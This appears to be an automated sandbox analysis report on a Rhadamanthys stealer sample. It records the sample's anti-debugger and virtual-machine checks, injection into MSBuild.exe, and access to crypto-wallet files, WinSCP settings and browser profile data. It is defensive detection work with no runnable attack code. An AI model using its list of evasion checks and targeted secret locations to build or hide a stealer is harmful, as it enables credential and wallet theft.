Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU""
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHA

Source: C:\Windows\System32\OpenWith.exe

Code function: 15_3_00007DF4E573AC1C str word ptr [eax-75h]

15_3_00007DF4E573AC1C

Source: C:\Windows\System32\dllhost.exe

Code function: GetAdaptersInfo,

17_2_000001D3CF5A2AC4

Source: C:\Windows\SysWOW64\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\OpenWith.exe

Code function: 15_3_00007DF4E5758E20 GetLogicalDriveStringsW,

15_3_00007DF4E5758E20

Source: C:\Windows\System32\OpenWith.exe

Code function: 15_3_00007DF4E57B7344 GetSystemInfo,

15_3_00007DF4E57B7344

Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local\Microsoft	Jump to behavior

Source: wmplayer.exe, 00000010.00000002.2882270249.00000203433F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWpMAC
Source: dialer.exe, 00000005.00000002.1994333377.0000000002978000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: OpenWith.exe, 0000000F.00000003.2079140690.000001F0D7399000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
Source: OpenWith.exe, 0000000F.00000003.2079140690.000001F0D7399000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
Source: dialer.exe, 00000005.00000002.1994333377.0000000002978000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: OpenWith.exe, 0000000F.00000003.2042892302.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMCIDevSymbolf
Source: wmplayer.exe, 00000010.00000002.2882270249.00000203433F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWQ
Source: dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW O
Source: nF54KOU30R.exe, 00000000.00000003.1916214760.0000000001000000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000001000000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1994333377.0000000002978000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000002.2882270249.00000203433F7000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000011.00000002.2881521633.000001D3CF5FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: OpenWith.exe, 0000000F.00000003.2075439224.000001F0D7372000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLinkY
Source: dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: OpenWith.exe, 0000000F.00000003.2116414121.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_die

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\nF54KOU30R.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\nF54KOU30R.exe

Code function: 0_3_03DB22CC VirtualAlloc,VirtualAlloc,VirtualProtect,LdrInitializeThunk,VirtualFree,

0_3_03DB22CC

Source: C:\Users\user\Desktop\nF54KOU30R.exe	Code function: 0_3_03DB2277 mov eax, dword ptr fs:[00000030h]		0_3_03DB2277
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 5_3_025D027F mov eax, dword ptr fs:[00000030h]		5_3_025D027F

Source: C:\Windows\System32\OpenWith.exe

Code function: 15_2_000001F0D53B1A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler,

15_2_000001F0D53B1A90

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\nF54KOU30R.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 1D3CF5A0000 protect: page read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\nF54KOU30R.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\nF54KOU30R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 452000	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 462000	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46A000	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46B000	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46C000	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 877008	Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1D3CF5A0000	Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 7FF70F3314E0	Jump to behavior

Source: C:\Users\user\Desktop\nF54KOU30R.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"	Jump to behavior

Source: C:\Windows\System32\OpenWith.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\OpenWith.exe

Code function: 15_3_00007DF4E574F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,

15_3_00007DF4E574F83C

Source: C:\Users\user\Desktop\nF54KOU30R.exe

Code function: 0_2_009C4675 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_009C4675

Source: C:\Windows\System32\OpenWith.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OllyDbg.exe

Stealing of Sensitive Information

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000005.00000003.1932913014.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1959663003.0000000004B25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1935862914.0000000003720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1978957383.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1982803526.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1994856642.0000000004310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: OpenWith.exe, 0000000F.00000003.2079637788.000001F0D7399000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\Qtum-Electrum\config
Source: OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\ElectronCash\config
Source: OpenWith.exe, 0000000F.00000003.2077419633.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\com.liberty.jaxx
Source: OpenWith.exe, 0000000F.00000003.2081933128.000001F0D7444000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Exodus\exodus.wallet
Source: OpenWith.exe, 0000000F.00000003.2081434576.000001F0D7371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: OpenWith.exe, 0000000F.00000003.2107739996.000001F0D7435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: !%LOCALAPPDATA%\Ethereum\keystore\
Source: OpenWith.exe, 0000000F.00000003.2081933128.000001F0D7444000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Exodus\exodus.wallet
Source: OpenWith.exe, 0000000F.00000003.2107739996.000001F0D7435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
Source: OpenWith.exe, 0000000F.00000003.2107739996.000001F0D7435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: !%LOCALAPPDATA%\Ethereum\keystore\
Source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\System32\OpenWith.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnails	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea	Jump to behavior
